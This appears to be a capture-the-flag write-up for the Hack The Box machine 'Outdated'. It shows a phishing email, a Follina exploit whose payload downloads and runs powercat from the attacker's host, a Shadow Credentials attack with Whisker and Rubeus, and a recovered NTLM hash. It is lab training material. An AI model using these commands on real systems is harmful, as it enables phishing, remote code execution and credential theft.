Foothold
Test email
adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO pwndot
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<anton@adot8.com>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 27 Feb 2025 07:11:58 -0600
-> To: itsupport@outdated.htb
-> From: anton@adot8.com
-> Subject: Internal Web App
-> Message-Id: <20250227071158.449184@pwndot>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
->
-> http://10.10.14.18
->
->
-> .
<- 250 Queued (10.890 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
adot@pwndot:~/htb/outdated$ updog -p 80
[+] Serving /home/adot/htb/outdated...
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:80
* Running on http://192.168.2.228:80
Press CTRL+C to quit
10.10.11.175 - - [27/Feb/2025 07:12:15] "GET / HTTP/1.1" 200 -
We can leverage MS-MSDT "Follina" (CVE-2022-30190)
adot@pwndot:~/htb/outdated/follina.py$ python follina.py -m command -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.18/powercat.ps1')" -t rtf -u 10.10.14.18
Generated 'clickme.rtf' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://10.10.14.18:80/exploit.htmladot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18/exploit.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
<SNIP>btables:GHKKb7GEHcccdCT8tQV2QwL3PS C:\Users\btables> whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
OUTDATED\ITStaff Group S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PS C:\Users\btables> .\SharpHound.exe -c all
.\SharpHound.exe -c all
2025-02-27T21:42:44.6514857-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2025-02-27T21:42:44.8858990-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
Compile, upload and run
PS C:\Users\btables> iwr 10.10.14.18/Whisker.exe -o whisker.exe
iwr 10.10.14.18/Whisker.exe -o whisker.exe
PS C:\Users\btables> .\Whisker.exe add /target:sflowers
.\Whisker.exe add /target:sflowers
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password NzycSJ15jTkcosRW
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 8b9c4eac-1869-4bdb-aae5-9a660ffde5e2
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:
Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAgziU8dnanmDAICB9AEggTY964E2gQSqUroHWujS01PzoWQg8NrVT08mQX67uM0Eo478GinAjJRKDJSvs4LnUC38lID1W1Y2ihK9bt/9vKomiEaHPS8ZcCk2yRm0gAQ19tqW4okyOn9ot+xOgPLY99LHZOBFB5bvHwhYt+V2AUO8939tPh8J0eaphKuqcQJH8lOiXKEWsXRmJUYmQ2078OtrWh1zyXwYoJ255+vHUU30of6rULLpNlGpd87P/mMAg/wRs875noyxcsKj7qbmyvDKq7gNq/sIHA/J+fGvmtUuuILJAll799WzFJhHxoV+9qxeEWtL0zo//BghUJx1CZ5eXHu22yYcHDeNWDIbFgbaxbXpwzqIV6jXfKKj7eiEI9ok+GHZr9BArG9B9089KpNG+R1/w21/17VbxjuvpBOxcZF9NR+nMsOiaqpKgPjalnV0mVbpJPQIS1uhYjWYzaNoxBpB3LjheossCco+uZrJewniSA0UHGRgCO9ND7Ww6KvrVDlsLzGaI2DgFhByKw4k/j7OZdsIP
<SNIP>Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzC.../password:"NzycSJ15jTkcosRW" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /showsflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5Last updated
Was this helpful?
